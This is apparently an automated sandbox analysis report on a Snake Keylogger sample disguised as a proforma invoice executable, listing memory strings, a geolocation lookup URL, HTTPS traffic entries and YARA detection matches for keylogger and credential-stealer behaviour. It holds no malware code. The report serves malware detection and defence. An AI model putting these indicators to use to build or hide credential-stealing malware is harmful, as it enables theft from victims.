Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 0000000C.00000002.1547422246.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: PROFORMA + PENDENTES.exe, WYqxTmjfOgdZ.exe.0.dr	String found in binary or memory: https://www.google.com/#q=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E46CE8	0_2_06E46CE8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E416E7	0_2_06E416E7
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E416F8	0_2_06E416F8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4B4E0	0_2_06E4B4E0
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4C2C8	0_2_06E4C2C8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4A240	0_2_06E4A240
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4A232	0_2_06E4A232
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E43032	0_2_06E43032
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E49E08	0_2_06E49E08
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E49DDA	0_2_06E49DDA
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4BDA8	0_2_06E4BDA8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_06E4BDB8	0_2_06E4BDB8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_07081F28	0_2_07081F28
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_07080040	0_2_07080040
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_07080007	0_2_07080007
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFC190	11_2_00FFC190
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF6108	11_2_00FF6108
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFB328	11_2_00FFB328
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFC470	11_2_00FFC470
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF97E8	11_2_00FF97E8
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFC751	11_2_00FFC751
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF6730	11_2_00FF6730
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF4AD9	11_2_00FF4AD9
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFCA31	11_2_00FFCA31
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFBBD3	11_2_00FFBBD3
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFBEB0	11_2_00FFBEB0
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FFB4F3	11_2_00FFB4F3
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF3570	11_2_00FF3570
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05CFDE98	12_2_05CFDE98
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05CFA408	12_2_05CFA408
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4E551	12_2_05F4E551
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F46CE8	12_2_05F46CE8
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4B4E0	12_2_05F4B4E0
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F416F8	12_2_05F416F8
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F416E7	12_2_05F416E7
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F43031	12_2_05F43031
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4C2C8	12_2_05F4C2C8
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4A240	12_2_05F4A240
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4BDB8	12_2_05F4BDB8
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F4BDA8	12_2_05F4BDA8
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05F49E08	12_2_05F49E08
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_0A650448	12_2_0A650448
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A6108	16_2_013A6108
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013AC190	16_2_013AC190
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013AB328	16_2_013AB328
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013AC470	16_2_013AC470
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013AC753	16_2_013AC753
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A9858	16_2_013A9858
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A6880	16_2_013A6880
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013ABBD3	16_2_013ABBD3
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013ACA33	16_2_013ACA33
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A4AD9	16_2_013A4AD9
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013ABEB0	16_2_013ABEB0
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A3573	16_2_013A3573
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013AB4F3	16_2_013AB4F3

Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1493095969.00000000070C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1491715421.0000000005C00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1482897862.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000000.1422736958.0000000000448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerhLq.exe8 vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.00000000027AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1632314031.00000000064DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PROFORMA + PENDENTES.exe
Source: PROFORMA + PENDENTES.exe	Binary or memory string: OriginalFilenamerhLq.exe8 vs PROFORMA + PENDENTES.exe

Source: PROFORMA + PENDENTES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
